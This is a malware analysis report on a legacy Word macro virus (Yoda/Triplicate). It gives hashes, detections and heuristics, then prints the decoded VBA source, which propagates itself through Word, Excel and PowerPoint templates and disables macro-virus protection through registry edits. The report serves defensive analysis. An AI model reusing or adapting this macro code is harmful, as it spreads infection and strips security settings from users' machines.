Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0f041bf3332207dc…

MALICIOUS

Office (OLE)

26.5 KB Created: 1999-06-08 21:30:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: c30e7698445ecff284591dc2c0ae9c37 SHA-1: 8c0a67a8819e8c9095e4c4020f2a679eb50ce62f SHA-256: 0f041bf3332207dc0c1100cf80e495e04c00b03a4bc4518bf988bd0396c16ec0
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros that utilize CreateObject and GetObject, indicative of attempts to manipulate the Office application or load external components. The ClamAV detections 'Doc.Trojan.Yoda-1' and 'Doc.Trojan.Tristate-1' strongly suggest malicious intent. The Document_Close subroutine appears to be designed to download and execute a second-stage payload, although the exact URL or mechanism is obfuscated. Note that the extracted macro source previewed below shows Document_Close copying the first code module between NormalTemplate and ActiveDocument (and, in the second variant, writing it into Excel and PowerPoint templates via CreateObject), so the download claim should be verified against that listing rather than taken from the heuristics alone.

Heuristics 4

  • ClamAV: Doc.Trojan.Yoda-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Yoda-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5855 bytes
SHA-256: d99713ad246d624590345e1a72ff9462cc1b3870adf54519f6c930550d9b1406
Detection
ClamAV: Doc.Trojan.Tristate-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst annotation: Word's Document_Close event handler. In this listing the
' handler copies the first code module of the container it runs from into the
' "other" container (NormalTemplate <-> ActiveDocument), i.e. the module
' propagates itself on document close. Nothing in these lines performs a
' network download; see the report text for the heuristic-based claim.
Private Sub Document_Close()
' Marker line. The loop further down searches the target module for this exact
' text ("'QXYZ") to recognise a module that already carries this code.
'QXYZ
' Buffer for the lines of this module before they are written into the target.
Dim linex As New Collection
' Every failure (e.g. VBProject access being blocked) is silently ignored.
On Error Resume Next
' Choose the target code module `t`: if this code is running from the Normal
' template, target the active document; if it is running from the active
' document, target the Normal template. Otherwise there is no target.
' NOTE(review): `t`, `isme`, `f` and `i` are not declared in this listing and
' no Option Explicit is visible, so they are implicit Variants.
If MacroContainer Is NormalTemplate Then
Set t = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
ElseIf MacroContainer Is ActiveDocument Then
Set t = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Else
t = ""
End If
' `isme` has not been assigned yet at this point, so within this listing the
' `Not isme` test always passes; the marker scan on the next line runs only
' after it and its result is never consulted afterwards.
If t <> "" And Not isme Then
' Scan the target module for the "'QXYZ" marker.
isme = False: For i = 1 To t.CountOfLines: If t.lines(i, 1) = "'QXYZ" Then isme = True
Next
' Remove an existing Document_Close ... End Sub region from the target:
' f = 1 while inside that region, f = 2 once its End Sub has been deleted.
f = 0: i = 1
While f <> 2 And i <= t.CountOfLines
If t.lines(i, 1) = "Private Sub Document_Close()" Then f = 1
' `f = False` here is immediately overwritten by `f = 2`.
If f = 1 And t.lines(i, 1) = "End Sub" Then t.DeleteLines i, 1: i = i - 1: f = False: f = 2
If f = 1 Then t.DeleteLines i, 1: i = i - 1
i = i + 1
Wend
' Snapshot every line of this container's first module, keyed "L1", "L2", ...
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
linex.Add CStr(MacroContainer.VBProject.VBComponents.Item(1).CodeModule.lines(i, 1)), "L" & i
Next
' Write the snapshot into the target module at the same line positions.
' Detection note: this is the step that modifies another VBA project via the
' VBProject object model; such access is a useful behavioural indicator.
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
t.InsertLines i, linex("L" & i)
Next
End If
End Sub

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
'Triplicate v0.21 /1nternal
Private Sub Document_Close()
    On Error Resume Next
    Options.VirusProtection = False
    Options.ConfirmConversions = False
    Options.SaveNormalPrompt = False
    Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set TT = Templates(1).VBProject.VBComponents(1).CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
    If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
        AD.DeleteLines 1, AD.CountofLines
        AD.InsertLines 1, TT.Lines(1, TT.CountofLines)
        If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
            AD.InsertLines 1, NT.Lines(1, NT.CountofLines)
        End If
    End If
    If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
        NT.DeleteLines 1, NT.CountofLines
        NT.InsertLines 1, AD.Lines(1, AD.CountofLines)
        Set xlApp = CreateObject("Excel.Application")
        If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Check"
            System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
            System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Whoa"
            Set Book1Obj = xlApp.Workbooks.Add
            Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountofLines)
            Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
            Book1Obj.Close
        End If
        xlApp.Quit
        Set PPObj = CreateObject("PowerPoint.Application")
        Set PBT = PPObj.Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse)
        For Each ModComponent In PBT.VBProject.VBComponents
            If ModComponent.Name = "Triplicate" Then dontadd = True
        Next
        If dontadd <> True Then
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
            System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\8.0\New User Settings\PowerPoint\Options", "MacroVirusProtection") = ""
            System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") 
... (truncated)